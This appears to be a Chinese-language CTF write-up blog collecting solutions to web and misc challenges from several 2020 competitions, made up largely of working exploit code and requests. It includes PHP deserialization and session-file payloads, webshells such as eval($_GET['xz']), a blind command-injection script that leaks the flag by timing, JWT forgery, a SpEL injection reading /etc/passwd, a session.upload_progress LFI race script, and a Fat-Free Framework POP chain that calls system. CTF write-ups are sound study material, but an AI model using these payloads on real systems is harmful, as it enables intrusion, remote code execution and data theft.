op4=>operation: 归纳,read(storage/$this->贡品)
op5=>operation: 总结,write(storage/$this->贡品，归纳),当PHPSESSID为空时,return NULL
op6=>operation: 种植,write(storage/sess_PHPSESSID,session_serialize)
e=>end: 完毕
st->op1->op2->op7->op3->op4->op5->op8->op4->op5->op6->e

可以对比无post_note情况下流程图,可以发现要生成node_cmd.php的前提条件为file_put_contents(/error_path)orfile_put_contents(new_file)可以执行,否则将无法谢shell

但回顾到一开始的状态,即无post_note情况下流程图,会发现若file_put_contents(/error_path)orfile_put_contents(new_file)可以执行,这样的话,在get方式请求时,都会生成两个文件。

更坑的是,当你到第二步,想利用/error_path/../sess_name 执行时,会导致sess_name会被写两次,导致无法实际控制

以下是我在假设环境符合题意下的payload 学习,若以上想法有什么问题,还请师傅们斧正.👍

当然由于path可控,那就可以直接尝试读取flag

反序列化

<?php
class 造齿轮 {
 protected $朝拜圣地 = 'storage';
 protected $贡品 = 'xz/../sess_xz';
 protected $圣殿 = 'cmd.php';
 protected $禁地 = '';
}
ini_set('session.save_path', '.');
session_start();
$_SESSION['a'] = new 造齿轮();
//urlencode  a%7CO%3A9%3A%22%E9%80%A0%E9%BD%BF%E8%BD%AE%22%3A4%3A%7Bs%3A15%3A%22%00%2A%00%E6%9C%9D%E6%8B%9C%E5%9C%A3%E5%9C%B0%22%3Bs%3A7%3A%22storage%22%3Bs%3A9%3A%22%00%2A%00%E8%B4%A1%E5%93%81%22%3Bs%3A13%3A%22xz%2F..%2Fsess_xz%22%3Bs%3A9%3A%22%00%2A%00%E5%9C%A3%E6%AE%BF%22%3Bs%3A7%3A%22cmd.php%22%3Bs%3A9%3A%22%00%2A%00%E7%A6%81%E5%9C%B0%22%3Bs%3A0%3A%22%22%3B%7D

先将序列化文本存储在sess_xzas文件中

Cookie: PHPSESSID=xz/../sess_xzas

note=a%7CO%3A9%3A%22%E9%80%A0%E9%BD%BF%E8%BD%AE%22%3A4%3A%7Bs%3A15%3A%22%00%2A%00%E6%9C%9D%E6%8B%9C%E5%9C%A3%E5%9C%B0%22%3Bs%3A7%3A%22storage%22%3Bs%3A9%3A%22%00%2A%00%E8%B4%A1%E5%93%81%22%3Bs%3A13%3A%22xz%2F..%2Fsess_xz%22%3Bs%3A9%3A%22%00%2A%00%E5%9C%A3%E6%AE%BF%22%3Bs%3A7%3A%22cmd.php%22%3Bs%3A9%3A%22%00%2A%00%E7%A6%81%E5%9C%B0%22%3Bs%3A0%3A%22%22%3B%7D

将payload导入到sess_xz中,

POST /babycode/ HTTP/1.1
Host: 192.168.21.136
Proxy-Connection: keep-alive
Content-Length: 35
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.21.136
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4255.0 Safari/537.36 Edg/87.0.634.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.21.136/babycode/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=xz
id: <?php phpinfo();?>

sess_xz 内容

balance|i:2233;items|a:1:{i:0;s:18:"<?php phpinfo();?>";}note|s:0:"";

导入sess_xzas,进行反序列化,将sess_xz中内容导入到node_cmd.php

GET /babycode/ HTTP/1.1
Host: 192.168.21.136
Proxy-Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4255.0 Safari/537.36 Edg/87.0.634.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=xzas

之后就可以访问node_cmd.php

balance|i:2233;items|a:1:{i:0;s:18:"<?php phpinfo();?>";}note|s:0:"";

learn from

MISC

crymisc

参考连接:

https://blog.xiafeng2333.top/ctf-30/

🔭💙🐰✊🌻🐧💙😘🌻🍶💐🍌🏊🍩🚁🏊👹🐶😀🐶😀😘👹💙🍂💇😀😀😩🌻🍟👂🍶💐🍌🏊🍩👆🏠🙇🍂🍂👼😱🚔🐶👉✊😱🏠🙇🍂🍂👼😱🚊😧💨💙💕
That is what i told her↑↑↑

爆破代码

https://github.com/pavelvodrazka/ctf-writeups/tree/master/hackyeaster2018/challenges/egg17/files/cracker

result

🐏城杯

web

easycon

扫到 index.php，根据提示上antsword

下载bbbbbbbb.txt,再转成flag.gif

cat bbbbbbbbb.txt |base64 -d >flag.gif

BlackCat

根据提示查看mp3

view-source:http://183.129.189.60:10022/Hei_Mao_Jing_Chang.mp3

在最后几行,存在代码

if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){
    die('Ë£¡¾¹¸Ò²ÈÎÒÒ»Ö»¶úµÄÎ²°Í£¡');
}

$clandestine = getenv("clandestine");//获得环境量

if(isset($_POST['White-cat-monitor']))
    $clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);//hmac-sha256 加密
// 注意 这里的 $clandestine 是encode($White-cat-monitor,$clandestine)
// $clandestine 可以为 空 var_dump(hash_hmac('sha256',array(),'fe1w0'));

$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);//同样对One-ear 加密
//  nc ;echo '<?php phpinfo();?>' > fe1w0.php
if($hh !== $_POST['Black-Cat-Sheriff']){  //encode(One-ear) === encode(Black-Cat-Sheriff)
    die('ÓÐÒâÃé×¼£¬ÎÞÒâ»÷·¢£¬ÄãµÄÃÎÏë¾ÍÊÇÄãÒªÃé×¼µÄÄ¿±ê¡£ÏàÐÅ×Ô¼º£¬Äã¾ÍÊÇÄÇ¿ÅÉäÖÐ°ÐÐÄµÄ×Óµ¯¡£');
}

echo exec("nc".$_POST['One-ear']);

payload from 🦌🥚

import requests
import hmac

url = "http://183.129.189.60:10022/"
data1 = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/="
str = ""
for t in range(1, 400):
    for i in data1:
        one = "1;if [ $(cat flag*|base64|cut -c %i) = \"%s\" ];then sleep 6;fi" % (t, i)
        key = b''
        black = hmac.new(key, one.encode('utf-8'), 'sha256').hexdigest()
        data2 = {
            "Black-Cat-Sheriff": black,
            "One-ear": one,
            "White-cat-monitor[]": "1"
        }
        try:
            res1 = requests.post(url, data=data2, timeout=4)
        except:
            str = str + i
            print(str)
            break
# print(data1)

easyphp

<?php
    $files = scandir('./'); 
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);//unlink() 函数删除文件
            }
        }
    }
    if(!isset($_GET['content']) || !isset($_GET['filename'])) {
        highlight_file(__FILE__);
        die();
    }
    $content = $_GET['content'];
    if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
        echo "Hacker";  //不区分大小写的
        die();
    }
    $filename = $_GET['filename'];
    if(preg_match("/[^a-z\.]/", $filename) == 1) { // 不能是字母
        echo "Hacker";
        die();
    }
    $files = scandir('./'); 
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file); // 再删一遍
            }
        }
    }
    file_put_contents($filename, $content . "\nHello, world");
?>

http://183.129.189.60:10023/sandbox/t1cje6n4eo2p7f7h90e54m7ng3/?filename=index.php&content=<?php eval($_GET['xz']) ?>

http://183.129.189.60:10023/sandbox/t1cje6n4eo2p7f7h90e54m7ng3/index.php?xz=system('cat /flag');

GWHT{easyApache} Hello, world

easyphp2

Coo kie:pass=GWHT 绕过第一层

读取源代码

使用file=php://filter/read=convert.quoted-printable-encode/resource=GWHT.php

The Count is: " . exec('printf \'' . $count . '\' | wc -c') . "

命令执行

http://183.129.189.60:10025/GWHT.php?count=1' | whoami ||'

?file=GWHT.php&count=1' | find / -name flag* > fe1w0||'
/GWHT/system/of/a/down/flag.txt

提高权限

www-data没有读flag.txt权限

cat /GWHT/* 得到GWHT加密后密码, 在https://www.somd5.com/

查询得到GWHTCTF

最后,登录GWHT账号,读取flag.txt。

www-data@18c88ee78e67:/var/www/html$ su GWHT
su GWHT
Password: GWHTCTF
cat  /GWHT/system/of/a/down/flag.txt
GWHT{Y0U_H4VE_A_BETTER_SK1LL}

DDCTF-2020

web

Web签到题

PS C:\WINDOWS\System32> curl.exe http://117.51.136.197/hint/1.txt
Interface documentation
- login interface
[-][Safet Reminder]The Private key cannot use request parameter
Request
Method | POST
URL    | http://117.51.136.197/admin/login
Param  | username str | pwd str
Response
token str | auth(Certification information)

- auth interface
Request
Method | POST
URL    | http://117.51.136.197/admin/auth
Param  | username str | pwd str | token str
Response
url str | client download link

+------------------+                +----------------------+                +--------------------+
|                  |                |                      |                |                    |
|                  +---------------->                      +---------------->                    |
|  Client(Linux)   |                |     Auth/Command     |                |       minion       |
|                  <----------------+                      +<---------------+                    |
|                  |                |                      |                |                    |
+------------------+                +----------------------+                +--------------------+

PS C:\WINDOWS\System32> curl.exe -X POST http://117.51.136.197/admin/login  -d 'username=1&pwd=1'
{"code":0,"message":"success","data":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6IjEiLCJwd2QiOiIxIiwidXNlclJvbGUiOiJHVUVTVCIsImV4cCI6MTU5OTMyMTMzOH0.n6AKHW8cOrmKyFZhIIeV66ZcUHx2b-D-lxT0mEheWUE"}

{
  "typ": "JWT",
  "alg": "HS256"
}

{
  "userName": "1",
  "pwd": "1",
  "userRole": "GUEST",
  "exp": 159xxxxxxx
}

这时只要细心观察或用jwtcrack 爆破,就会发现Secret为pwd

./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6IjEiLCJwd2QiOiIxIiwidXNlclJvbGUiOiJHVUVTVCIsImV4cCI6MTU5OTMyMjA4OX0.TgqnVS7NyDbmX4M38Ow-K8ilgFYHx5-jzbOxUPYxoyw
Secret is "1"

那么我们就根据jwt格式编写admin的jwt就行

import jwt
a = {
  "userName": "admin",
  "pwd": "fe1w0",
  "userRole": "ADMIN",
  "exp": 1599322683
}
jj=jwt.encode(a,'fe1w0', algorithm='HS256')
print(jj)
#eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6ImFkbWluIiwicHdkIjoiZmUxdzAiLCJ1c2VyUm9sZSI6IkFETUlOIiwiZXhwIjoxNTk5MzIyNjgzfQ.toeN4J1eAkPmZFnYXsL4qNqHhPF31YnKPv6VjZV7n_M

获得下载链接http://117.51.136.197/B5Itb8dFDaSFWZZo/client

PS C:\WINDOWS\System32> curl.exe -X POST  http://117.51.136.197/admin/auth  -d 'username=admin&pwd=fe1w0&token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6ImFkbWluIiwicHdkIjoiZmUxdzAiLCJ1c2VyUm9sZSI6IkFETUlOIiwiZXhwIjoxNTk5MzIyNjgzfQ.toeN4J1eAkPmZFnYXsL4qNqHhPF31YnKPv6VjZV7n_M'
{"code":0,"message":"success","data":"client dowload url: http://117.51.136.197/B5Itb8dFDaSFWZZo/client"}

client

fe1w0@fe1w0:~$ ./client 
2020/09/05 00:43:57 
 ____  _  ____  _  ____  _____  _____       ____  ____  ____  ____ 
/  _ \/ \/  _ \/ \/   _\/__ __\/    /      /_   \/  _ \/_   \/  _ \
| | \|| || | \|| ||  /    / \  |  __\_____  /   /| / \| /   /| / \|
| |_/|| || |_/|| ||  \__  | |  | |   \____\/   /_| \_/|/   /_| \_/|
\____/\_/\____/\_/\____/  \_/  \_/         \____/\____/\____/\____/

2020/09/05 00:43:57 
+---------------------------------------------------+
|Flag Path      := /home/dc2-user/flag/flag.txt                 |
|签名格式       :=      command|time_stamp                                      |
+---------------------------------------------------+

2020/09/05 00:43:57 
+------------------+                +----------------------+                +--------------------+
|                  |                |                      |                |                    |
|                  +---------------->                      +---------------->                    |
|     Client       |                |     Auth/Command     |                |       minion       |
|                  <----------------+                      +<---------------+                    |
|                  |                |                      |                |                    |
+------------------+                +----------------------+                +--------------------+

2020/09/05 00:43:57 [*]Start ping master...
2020/09/05 00:43:58 [-]http://117.51.136.197/server/health connect succuess
2020/09/05 00:43:58 [*]Start send command to minions...
2020/09/05 00:43:58 [+]get sign:F75PJ/5iqAUAek5+0lXL6WJgslyD0Wn5X5l4gGCICwI=, command:'DDCTF', time_stamp:1599237838
2020/09/05 00:43:58 [+]send command url  and response:{"code":0,"message":"success","data":"DDCTF"}

wireshark抓包

GET /server/health HTTP/1.1
Host: 117.51.136.197
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

HTTP/1.1 200 
Server: nginx/1.14.0 (Ubuntu)
Date: Sat, 05 Sep 2020 11:48:37 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive

2a
{"code":0,"message":"success","data":null}
0

POST /server/command HTTP/1.1
Host: 117.51.136.197
User-Agent: Go-http-client/1.1
Content-Length: 103
Content-Type: application/json
Accept-Encoding: gzip

{"signature":"vwrEgR0HccLWvCB+FsgFevwkazZ5JmMECH8cDaBicuA=","command":"'DDCTF'","timestamp":1599306517}HTTP/1.1 200 
Server: nginx/1.14.0 (Ubuntu)
Date: Sat, 05 Sep 2020 11:48:37 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive

2d
{"code":0,"message":"success","data":"DDCTF"}
0

signature 伪造 from saltstack_hmac

paylaod

比赛后问别的师傅,是 SPEL_SSTI 学习到了 ssti

import hmac
import hashlib
import base64
import time
import requests
import json

key = b'DDCTFWithYou'
t = str(int(time.time())) #time_stamp

# read /etc/passwd 
#command = "{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}"
# read /home/dc2-user/flag/flag.txt  command = "{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(100)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(50)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(117)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(114)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(102)).concat(T(java.lang.Character).toString(108)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(103)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(102)).concat(T(java.lang.Character).toString(108)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(103)).concat(T(java.lang.Character).toString(46)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(120)).concat(T(java.lang.Character).toString(116))).getInputStream())}"
command = "{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(100)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(50)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(117)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(114)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(102)).concat(T(java.lang.Character).toString(108)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(103)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(102)).concat(T(java.lang.Character).toString(108)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(103)).concat(T(java.lang.Character).toString(46)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(120)).concat(T(java.lang.Character).toString(116))).getInputStream())}"
message = '''%s|%s''' %(command,t)
h = hmac.new(key, bytes(message, encoding = "utf8"), hashlib.sha256).digest()
my_sign = base64.standard_b64encode(h)
my_sign = str(my_sign, encoding = "utf-8") 

data = '''{"signature":"%s","command":"%s","timestamp":%s}''' %(my_sign,command,t)
#print("data: "+data+'\n\r\n\r')
res = requests.post('http://117.51.136.197/server/command',data=data)
print(res.text)

Overwrite Me [暂时未复现]

MISC

一起拼图吗

PS 拼图即可

DDCTF{484e61cd1483c34d08e4d76f9022d03b}

WMCTF

web

web_checkin

我一直以为要伪协议来绕过exit,见P神谈一谈php://filter的妙用

<?php
//PHP 7.0.33 Apache/2.4.25
error_reporting(0);
$sandbox = 'D:/phpstudy_pro/WWW/test/' . md5($_SERVER['REMOTE_ADDR']);
@mkdir($sandbox);
@chdir($sandbox);
highlight_file(__FILE__);
if(isset($_GET['content'])) {
    $content = $_GET['content'];
    if(preg_match('/iconv|UCS|UTF|rot|quoted|base64/i',$content))
         die('hacker');
    if(file_exists($content))
        require_once($content);
    file_put_contents($content,'<?php exit();'.$content);
}

但这题直接读就行。

Make PHP Great Again

参考
利用session.upload_progress进行文件包含和反序列化渗透
LFI 绕过 Session 包含限制 Getshell
PHP LFI 利用临时文件 Getshell 姿势
此题

apache2配置信息 http://no_body_knows_php_better_than_me.glzjin.wmctf.wetolink.com/?file=/etc/apache2/apache2.conf
/proc/self/maps 读取内存映射的相关信息

但php.ini还是读不了,但可以根据2.0得到提示为/tmp文件夹下

默认文件夹,如下:
/var/lib/php/sess_PHPSESSID
/var/lib/php/sessions/sess_PHPSESSID
/tmp/sess_PHPSESSID
/tmp/sessions/sess_PHPSESSID

payload

import io
import requests
import threading
sessid = 'XZASFE1W0'
data = {"cmd":'system("cat flag.php");'}
def write(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post( 'http://no_body_knows_php_better_than_me.glzjin.wmctf.wetolink.com/index.php', data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST["cmd"]);?>'}, files={'file': ('test.txt',f)}, cookies={'PHPSESSID': sessid} )
def read(session):  
    while True:
        resp = session.post('http://no_body_knows_php_better_than_me.glzjin.wmctf.wetolink.com/?file=/tmp/sess_'+sessid,data=data)
        if 'test.txt' in resp.text:
            print(resp.text)
            event.clear()
        else:
            print("[+++++++++++++]retry")
if __name__=="__main__":
    event=threading.Event()
    with requests.session() as session:
        for i in range(1,30): 
            threading.Thread(target=write,args=(session,)).start()
        for i in range(1,30):
            threading.Thread(target=read,args=(session,)).start()
    event.set()

result

Make PHP Great Again 2.0

与1.0 的区别:

1.0: \#!/bin/bash if [[ -f /flag.sh ]]; then source /flag.sh fi apache2-foreground

require_once 和 include_once 原理

再一次, 不要使用(include/require)_once

尝试解析文件的绝对路径, 如果能解析成功, 则检查EG(included_files), 存在则返回, 不存在继续
打开文件, 得到文件的打开路径(opened path)
拿opened path去EG(included_files)查找, 是否存在, 如果存在则返回, 不存在继续
编译文件(compile_file)

payload

/x/../proc/self/cwd/flag

比赛和复现过程中遇到的好文章:

Security in PHP – 那些在滲透測試的小技巧

webweb

https://fatfreeframework.com/3.7/getting-started
这题是真滴累

index.php

<?php
// Kickstart the framework
$f3=require('lib/base.php');
$f3->set('DEBUG',1);
if ((float)PCRE_VERSION<8.0)
    trigger_error('PCRE version is out of date');
// Load configuration
$f3->config('config.ini');

// set a route for get method 
$f3->route('GET /',
    function($f3) {
        echo "just get me a,don't do anything else";
    }
);
unserialize($_GET['a']);

$f3->run();

index.php的执行顺序,如下:

框架初始化和配置文件导入
设置一个get请求方式的路由器
反序列化参数a
f3执行

ws.php

websocket RFC6455 手册
简介版

从index.php的执行顺序来看,代码必定会加载ws.php来进行网络通信,在WS和Agent类中都有回调函数,其中Agent类中的__destruct()方法最好调用

    function __destruct() {
        if (isset($this->server->events['disconnect']) &&
            is_callable($func=$this->server->events['disconnect']))
            $func($this);
    }

    function __construct($server,$socket,$verb,$uri,array $hdrs) {
        $this->server=$server;
        $this->id=stream_socket_get_name($socket,TRUE);
        $this->socket=$socket;
        $this->verb=$verb;
        $this->uri=$uri;
        $this->headers=$hdrs;

        if (isset($server->events['connect']) &&
            is_callable($func=$server->events['connect'])){
                $func($this);
            }

    }

按道理来说__construct中的回调函数应该也可,但本地测试时,一直失败

测试脚本

<?php

namespace cli;
class WS{
    public function __construct()
    {   
        $this=$this;
        $this->agents = new Agent($this);
    }
}

namespace cli;

class Agent
{
    public function __construct($ws)
    {
        $this->server=$ws;
        $this->events = array("disconnect"=>"var_dump");
    }
}

echo (serialize(new WS()));
/*
O:6:"cli\WS":1:{s:6:"agents";O:9:"cli\Agent":2:{s:6:"server";r:1;s:6:"events";a:1:{s:10:"disconnect";s:8:"var_dump";}}}
*/

但此处得到的payload无效,var_dump并不会执行

php 对象引用

<?php
class A{
    public $AA;
    function __construct(){
        $this->AA=new B($this);
    }
}
class B{
    public $BB;
    function __construct($BB)
    {
        $this->BB=$BB;
    }
}

$a = new A();
echo serialize($a)."\n";
/* 
O:1:"A":1:{s:2:"AA";O:1:"B":1:{s:2:"BB";r:1;}}
*/

其中的r表示对象引用,而后的数字r :< number >,可以理解为序列化的层数

见 PHP 序列化（serialize）格式详解

O:6:"cli\WS":1:{s:6:"agents";O:9:"cli\Agent":2:{s:6:"server";r:1;s:6:"events";a:1:{s:10:"disconnect";s:8:"var_dump";}}}
#  r:1转为r:2 
O:6:"cli\WS":1:{s:6:"agents";O:9:"cli\Agent":2:{s:6:"server";r:2;s:6:"events";a:1:{s:10:"disconnect";s:8:"var_dump";}}}

但不知为什么r:1转为r:2 , 即$this->server=$this payload就可以用

<?php
namespace cli;
class WS{
    public function __construct()
    {   
        $this->agents = new Agent($this);
    }
}

namespace cli;
class Agent
{
    public function __construct()
    {
        $this->server=$this;
        $this->events = array("disconnect"=>"var_dump");
    }
}

echo (serialize(new WS()));
# O:6:"cli\WS":1:{s:6:"agents";O:9:"cli\Agent":2:{s:6:"server";r:2;s:6:"events";a:1:{s:10:"disconnect";s:8:"var_dump";}}}

下一步: 使$this->server=$this;可控

利用db\sql\mapper.php中的__call()函数来 getshell

原本想试试db\sql.php虽然__call()也可以控制,方法跟下面差不多,就是数组那个要写成[对象|类,函数名]的形式

    function __call($func,$args) {
        return call_user_func_array(
            (array_key_exists($func,$this->props)?   //检查数组里是否有指定的键名或索引
                $this->props[$func]:
                $this->$func),$args
        );
    }

    function find($filter=NULL,array $options=NULL,$ttl=0) {
        if (!$options)
            $options=[];
        $options+=[
            'group'=>NULL,
            'order'=>NULL,
            'limit'=>0,
            'offset'=>0
        ];
        $adhoc='';
        foreach ($this->adhoc as $key=>$field)
            $adhoc.=','.$field['expr'].' AS '.$this->db->quotekey($key);
        return $this->select(
            ($options['group'] && !preg_match('/mysql|sqlite/',$this->engine)?
                $options['group']:
                implode(',',array_map([$this->db,'quotekey'],
                    array_keys($this->fields)))).$adhoc,$filter,$options,$ttl);
    }

此外,将$this->db = $this,

上面代码可以简化为

<?php
class A{
    public $AA;
    public $num = 1;
    public $cmd = "whoami";
    public $props;
    function __construct(){
        $this->AA=$this;
        $this->props = array("kali"=>"system");
    }
    function __call($func,$args) {
        return call_user_func_array(
            (array_key_exists($func,$this->props)?   //检查数组里是否有指定的键名或索引
                $this->props[$func]:
                $this->$func),$args
        );
    }
    function find(){
        $this->AA->kali($this->cmd);
    }

}
$aa = new A();
$aa->find();
# 注意传参就传了一个

故此,payload:

<?php
namespace DB\SQL;
class Mapper
{
    public $props;
    public function __construct()
    {
        $this->adhoc=['ls'=>["xz"=>"fe10"]];
        $this->fields=[];
        $this->props = ['quotekey' => "system"];
        $this->db = $this;
    }
}
namespace cli;
use DB\SQL\Mapper;
class Agent
{
    public function __construct()
    {
        $this->server = $this;
        $this->events = ["disconnect" => new Mapper()];
    }
}
namespace cli;
class WS{
    public function __construct()
    {
        $this->test = new Agent();
    }
}
echo (serialize(new WS()));
#O:6:"cli\WS":1:{s:4:"test";O:9:"cli\Agent":2:{s:6:"server";r:2;s:6:"events";a:1:{s:10:"disconnect";O:13:"DB\SQL\Mapper":4:{s:5:"props";a:1:{s:8:"quotekey";s:6:"system";}s:5:"adhoc";a:1:{s:2:"ls";a:1:{s:2:"xz";s:5:"fe1w0";}}s:6:"fields";a:0:{}s:2:"db";r:5;}}}}

但这样会导致isset($this->server->events['disconnect']) && is_callable($func=$this->server->events['disconnect']) 为false

需要$this->events = ["disconnect" => new Mapper()]; 改为*$**this*->events = ["disconnect" => [new Mapper()],'find'];

为什么要写find以及在后面

写的原因

if(is_callable([new A(),"find"])){
    echo "true";
}

if(is_callable(["find",new A()])){
    echo "true";
}

if(is_callable([new A()])){
    echo "true";
}

if(is_callable(new A())){
    echo "true";
}
#或
echo serialize([new A(),"find"])."\n";
echo serialize(["find",new A()])."\n";
echo serialize([new A()])."\n";
echo serialize(new A())."\n";
/*
a:2:{i:0;O:1:"A":4:{s:2:"AA";r:2;s:3:"num";i:1;s:3:"cmd";s:6:"whoami";s:5:"props";a:1:{s:4:"kali";s:6:"system";}}i:1;s:4:"find";}
a:2:{i:0;s:4:"find";i:1;O:1:"A":4:{s:2:"AA";r:3;s:3:"num";i:1;s:3:"cmd";s:6:"whoami";s:5:"props";a:1:{s:4:"kali";s:6:"system";}}}
a:1:{i:0;O:1:"A":4:{s:2:"AA";r:2;s:3:"num";i:1;s:3:"cmd";s:6:"whoami";s:5:"props";a:1:{s:4:"kali";s:6:"system";}}}
O:1:"A":4:{s:2:"AA";r:1;s:3:"num";i:1;s:3:"cmd";s:6:"whoami";s:5:"props";a:1:{s:4:"kali";s:6:"system";}}
*/

这四个if中,只有第一个是正确的,感觉这个跟执行顺序有关

以正确的payload为例

O:6:"cli\WS":1:{s:4:"test";O:9:"cli\Agent":2:{s:6:"server";r:2;s:6:"events";a:2:{s:10:"disconnect";a:1:{i:0;O:13:"DB\SQL\Mapper":4:{s:5:"props";a:1:{s:8:"quotekey";s:6:"system";}s:5:"adhoc";a:1:{s:2:"ls";a:1:{s:2:"xz";s:5:"fe1w0";}}s:6:"fields";a:0:{}s:2:"db";r:6;}}i:0;s:4:"find";}}}

db 的r:<number>为6,同时db还指向自己一次,即多加了一层,}} 回退两次后,到达的层为\DB\Cursor,而在\DB\Cursor的方法中只有find 函数符合要求

\DB\Cursor 原因 class Mapper *extends* \DB\Cursor

    /**
    *   Return records (array of mapper objects) that match criteria
    *   @return array
    *   @param $filter string|array
    *   @param $options array
    *   @param $ttl int
    **/
    abstract function find($filter=NULL,array $options=NULL,$ttl=0);

正确的payload

<?php
namespace DB\SQL;
class Mapper
{
    public $props;
    public function __construct()
    {
        $this->adhoc=['ls'=>["xz"=>"fe1w0"]];
        $this->fields=[];
        $this->props = ['quotekey' => "system"];
        $this->db = $this;
    }
}
namespace cli;
use DB\SQL\Mapper;
class Agent
{
    public function __construct()
    {
        $this->server = $this;
        $this->events = ["disconnect" => [new Mapper(),"find"]];
    }
}
namespace cli;
class WS{
    public function __construct()
    {
        $this->test = new Agent();
    }
}
echo (serialize(new WS()));

web_checkin2

这题好像坏了,一直打不开

思路:

利用session.upload_progress进行文件包含和反序列化渗透

LFI 绕过 Session 包含限制 Getshell

PHP LFI 利用临时文件 Getshell 姿势

但后面出题方放弃修这道题,无法正常访问。

其他

web

noclass

很有意思一道题,靠🦌🥚弄的

payload

<?php
$flag = "flag";
$f = new stdClass();
$f->c = "haha";
$f->d = &$f->c;
echo serialize($f);
$b = $f;
$b->c = $flag;
echo serialize($b);
foreach($b as $key => $value)
{
        if($key==='c')
        {
                continue;
        }
        echo $value;
}

第十三届全国大学生信息安全竞赛-创新实践能力赛

web

fork

rceme

littlegame

easytrick

babyunserialize

🎣杯

web

gamebox

easyseed

easyweb

第四届强网杯

强网先锋

web辅助

主动

Funhash

upload

GACTF

web

simpleflask

EZFLASK

xwiki

carefuleyes

babyshop[复现]

手动分析

执行代码中坑:

具体分析

MISC

crymisc

🐏城杯

web

easycon

BlackCat

easyphp

easyphp2

DDCTF-2020

web

Web签到题

Overwrite Me [暂时未复现]

MISC

一起拼图吗

WMCTF

web

web_checkin

Make PHP Great Again

Make PHP Great Again 2.0

webweb

web_checkin2

其他

web

noclass

安恒八月[暂时未复现]

发送评论 编辑评论

推荐文章

发送评论编辑评论